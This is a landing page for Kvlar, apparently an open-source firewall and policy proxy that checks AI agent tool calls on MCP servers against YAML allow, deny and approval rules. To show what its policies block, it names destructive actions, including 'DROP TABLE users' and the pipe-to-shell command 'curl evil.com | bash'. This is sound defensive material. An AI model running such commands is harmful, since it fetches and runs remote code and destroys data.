Open source · Apache 2.0

The firewall
for agent
actions.

Kvlar is an open-source policy engine that evaluates every AI agent tool call against security rules before execution. Fail-closed. Deterministic. Auditable.

View source→Documentation

policy.yaml

rules:
  - id: allow-reads
    resources: ["read_*"]
    effect: allow

  - id: deny-destructive
    resources: ["delete_*", "drop_*"]
    effect: deny

  - id: approve-writes
    resources: ["write_*"]
    effect: require_approval

196

tests passing

server policies

dependencies with I/O in core

<1ms

policy evaluation

Architecture

How it
works.

Kvlar sits between the agent and its tools as a transparent proxy. Every tool call passes through the policy engine. No code changes required.

Agent

stdio→←

KVLAR PROXY

Policy Engine

Audit Logger

stdio→←

MCP Server

Intercept

Kvlar spawns the upstream MCP server as a child process. All stdio traffic flows through the proxy transparently.

Evaluate

The pure policy engine matches each tool call against YAML rules. Same input, same output, every time. Zero I/O in the core.

Enforce

Allow, deny, or require human approval. Denied actions return structured errors the LLM can understand and relay to the user.

Real threats

What your agents
can do today.

AI agents have access to databases, APIs, cloud infrastructure, and messaging platforms — with no security boundary. Kvlar ships curated policies for popular MCP servers.

Postgres

DROP TABLE users

Destructive DDL blocked

kvlar init --template postgres11 rules

GitHub

Force-push to main

Code changes gated

kvlar init --template github13 rules

Slack

Message the CEO

Sends require approval

kvlar init --template slack8 rules

Shell

curl evil.com | bash

Pipe-to-shell denied

kvlar init --template shell28 rules

Design principles

Built different.

Fail-closed

If no policy rule matches, the action is denied. Security tools must be restrictive by default — not permissive.

Policy as code

YAML policies live in your repo. Version-controlled, reviewable in PRs, testable in CI. No dashboards, no black boxes.

Pure core engine

kvlar-core has zero I/O dependencies. Given the same action and policy, you get the same decision every time. Fully deterministic.

Protocol-native

Built for MCP at the transport layer. Understands JSON-RPC tool calls natively. Not bolted on as middleware.

Get started

Zero to enforcing
in 60 seconds.

Three commands. No config files to write. No servers to set up.

terminal

# Install Kvlar
$ cargo install kvlar-cli

# Pick a curated policy for your MCP server
$ kvlar init --template postgres
✓ Created ~/.kvlar/policy.yaml (11 rules)

# Wrap your MCP servers with the security proxy
$ kvlar wrap
✓ Wrapped 3 MCP servers in Claude Desktop config

# Verify your policy works as expected
$ kvlar test
✓ 17/17 tests passed

Your agents need
a security layer.

Kvlar is Apache 2.0 licensed, written in Rust, and ready to use today.

Get started→Read the docs

The firewallfor agentactions.

How itworks.